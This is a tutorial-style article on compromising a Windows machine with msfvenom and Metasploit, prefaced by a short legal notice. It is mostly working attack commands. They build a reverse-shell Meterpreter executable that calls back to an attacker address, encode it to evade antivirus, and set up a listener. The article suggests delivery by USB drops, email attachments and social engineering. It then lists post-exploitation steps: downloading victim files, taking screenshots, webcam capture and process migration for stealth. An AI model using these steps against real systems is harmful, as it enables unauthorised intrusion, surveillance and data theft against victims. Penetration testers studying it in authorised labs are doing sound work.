Gaining Access to a Windows System Using msfvenom and Metasploit
Legal Notice
This article is intended solely for educational purposes and should be used only in authorized penetration testing environments. Unauthorized access to computer systems is illegal and unethical. Always obtain proper consent before conducting any testing.
Introduction
The Metasploit Framework is a powerful toolset used by penetration testers and security researchers for identifying, exploiting, and validating vulnerabilities. One of its core utilities, msfvenom, enables users to generate payloads tailored to various platforms, encodings, and delivery methods.
This guide covers everything from generating a simple reverse shell payload for Windows systems to using encoders, configuring listeners, and executing post-exploitation tasks using Meterpreter, Metasploit's advanced payload shell.
What is msfvenom?
msfvenom is a command-line tool included with Metasploit that combines two older tools: msfpayload and msfencode. It is used to generate payloads in multiple formats and apply encoding techniques to help evade antivirus detection.
Step-by-Step: Exploiting a Windows Machine
Step 1: Generating a Basic Payload
Let’s start with a basic reverse TCP Meterpreter payload targeting a Windows system.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -f exe > /root/Desktop/malicious.exe
Explanation:
-p: Specifies the payload type.LHOST: IP address of your attacker machine.LPORT: Port to listen on.-f exe: Output format (Windows executable).>: Output redirection to file.
This payload, when executed on the victim’s system, connects back to the attacker's machine to open a Meterpreter session.
Step 2: Using Encoders (Optional for Evasion)
You can use encoders to obfuscate the payload and attempt to evade detection by antivirus software.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > /root/Desktop/encoded.exe
Explanation:
-e x86/shikata_ga_nai: Encoder type.-i 3: Number of iterations (encoding rounds).-f exe: Output format.
Common Encoders:
| Encoder | Platform | Notes |
|---|---|---|
x86/shikata_ga_nai |
Windows | Polymorphic XOR encoder |
x86/countdown |
Windows | Countdown-based |
cmd/powershell_base64 |
Windows | Useful for PowerShell payloads |
x64/xor |
Windows | XOR encoder for 64-bit binaries |
To list all available encoders:
msfvenom --list encoders
Step 3: Exploring Payload Options
To list payloads:
msfvenom --list payloads
Categories of Payloads:
windows/meterpreter/reverse_tcp: Reverse shell with advanced features.windows/shell/reverse_tcp: Basic command shell.linux/x86/meterpreter/reverse_tcp: For Linux targets.android/meterpreter/reverse_tcp: For Android devices.
To view required options for a specific payload:
msfvenom -p windows/meterpreter/reverse_tcp --list-options
Step 4: Starting a Listener with Metasploit
Once the payload is ready, open Metasploit and set up the listener:
msfconsole
Then configure:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 4444
exploit
Now Metasploit is listening for a reverse shell.
Step 5: Deliver the Payload
Transfer malicious.exe to the victim system using:
- USB drops
- Email attachments
- Social engineering techniques
- Embedding in documents using tools like Shellter
Once the victim executes the file, you’ll receive a Meterpreter session.
Step 6: Working with Meterpreter
After the victim executes the payload, you will see output like:
[*] Sending stage (175174 bytes) to 192.168.0.112
[*] Meterpreter session 1 opened
Connect to the session:
sessions
sessions -i 1
Useful Meterpreter Commands
Here are commonly used Meterpreter commands during post-exploitation.
System Info
sysinfo
Displays operating system details and architecture.
Current User
getuid
Shows the current username.
File Navigation
ls
cd Desktop
List files and change directories.
Upload a File
upload /root/tool.exe C:\\Users\\Admin\\Desktop\\
Sends a file to the victim.
Download a File
download C:\\Users\\Admin\\Documents\\secrets.txt /root/Desktop/
Retrieves a file from the victim.
Screenshot
screenshot
Takes a screenshot of the victim's desktop.
Webcam Snap (if hardware present)
webcam_snap
Captures an image using the webcam.
Process Management
ps
Lists running processes.
migrate 4524
Moves Meterpreter to another process like explorer.exe for stealth and stability.
Exit Session
exit
Or kill from main shell:
sessions -k 1
Optional: Generate Other File Formats
You can also generate payloads in other formats:
-f asp: ASP script-f war: Java web archive-f powershell: PowerShell command-f dll: Dynamic Link Library-f python: Python script
Conclusion
This article has walked through the complete process of exploiting a Windows machine using msfvenom and Metasploit—from basic payload creation to advanced post-exploitation using Meterpreter. You've also seen how to enhance payloads with encoders, explore available payload types, and generate alternate formats for different attack vectors.
These techniques are foundational for ethical hackers and penetration testers working in controlled, authorized environments.